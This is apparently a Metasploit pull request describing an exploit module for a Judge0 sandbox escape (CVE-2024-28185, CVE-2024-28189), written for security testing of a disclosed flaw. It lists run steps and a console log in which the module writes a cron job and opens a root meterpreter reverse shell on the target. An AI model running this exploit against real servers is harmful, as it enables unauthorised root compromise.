Add module: Judge0 sandbox escape CVE-2024-28185, CVE-2024-28189

[Takahiro-Yoko]

Fixes https://github.com/rapid7/metasploit-framework/issues/19149

Vulnerable Application

Judge0 does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.

The vulnerability affects:

* Judge0 <= 1.13.0

This module was successfully tested on:

* Judge0(v1.13.0) installed with Docker on Ubuntu 20.0.4

Verification Steps

1. Install the application
2. Start msfconsole
3. Do: use exploit/linux/http/judge0_sandbox_escape_cve_2024_28189
4. Do: run lhost=<lhost> rhost=<rhost>
5. You should get a meterpreter

Scenarios

msf6 > use exploit/linux/http/judge0_sandbox_escape_cve_2024_28189
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/judge0_sandbox_escape_cve_2024_28189) > run lhost=192.168.56.1 rhost=192.168.56.15

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version 1.13.0 detected, which is vulnerable
[+] The target appears to be vulnerable.
[*] Writing cron job to /etc/cron.d/NoIkOQee
[*] Use language: 54, C++ (GCC 9.2.0)
[+] Deleted /etc/cron.d/NoIkOQee
[+] Deleted /root/FYiyRjmjQt
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.15:45438) at 2024-10-29 08:49:03 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 10.2 (Linux 5.4.0-196-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/root
meterpreter > 

[jheysel-r7]

Release Notes

This adds an exploit module for a Judge0 sandbox escape which exploits CVE-2024-28185, CVE-2024-28189 and allows for unauthenticated RCE. Judge0 version 1.13.0 and prior are vulnerable.